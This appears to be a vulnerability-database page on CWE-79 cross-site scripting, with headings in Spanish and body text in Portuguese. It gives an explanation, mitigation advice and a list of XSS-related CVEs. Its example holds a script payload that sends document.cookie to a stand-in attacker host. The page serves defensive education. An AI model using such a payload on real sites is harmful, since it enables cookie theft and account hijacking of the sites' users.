Fallos del tipo CWE-79

28.942 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24623—WordPress Advanced Ticket System < 1.0.64 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.6%CVE-2021-24381—NinjaForms < 3.5.8.2 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2024-29137HIGHWordPress Tourfic plugin <= 2.11.7 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2024-29138HIGHWordPress Restrict User Access plugin <= 2.5 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2021-24700—Forminator < 1.15.4 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2014-125098MEDIUMDart http_server Directory Listing virtual_directory.dart VirtualDirectory cross site scriptingEPSS 0.6%CVE-2021-24619—Per Page Add to Head <= 1.4.4 - Authenticated Stored XSSEPSS 0.6%CVE-2021-1457MEDIUMCisco Firepower Management Center Software Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2021-1458MEDIUMCisco Firepower Management Center Software Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2021-1456MEDIUMCisco Firepower Management Center Software Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2021-36803MEDIUMAkaunting Avatar Persistent XSSEPSS 0.6%CVE-2021-34738MEDIUMCisco Identity Services Engine Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2024-4528LOWSourceCodester Prison Management System user-record.php cross site scriptingEPSS 0.6%CVE-2021-3853MEDIUMCross-site Scripting (XSS) - Stored in chaskiq/chaskiqEPSS 0.6%CVE-2019-25096LOWsoerennb eXtplorer cross site scriptingEPSS 0.6%CVE-2025-5350MEDIUMSSRF and Reflected XSS Vulnerability in Deprecated Try-It Feature of Multiple WSO2 ProductsEPSS 0.6%CVE-2024-42791HIGHA Cross-Site Request Forgery (CSRF) vulnerability was found in Kashipara Music Management System v1.0 via /music/ajax.php?action=delete_genrEPSS 0.6%CVE-2021-1455—Cisco Firepower Management Center Software Cross-Site Scripting VulnerabilitiesEPSS 0.6%CVE-2022-22112MEDIUMDayByDay CRM - Application-Wide Client-Side Template Injection (CSTI)EPSS 0.6%CVE-2022-40912MEDIUMETAP Lighting International NV ETAP Safety Manager 1.0.0.32 is vulnerable to Cross Site Scripting (XSS). Input passed to the GET parameter 'EPSS 0.6%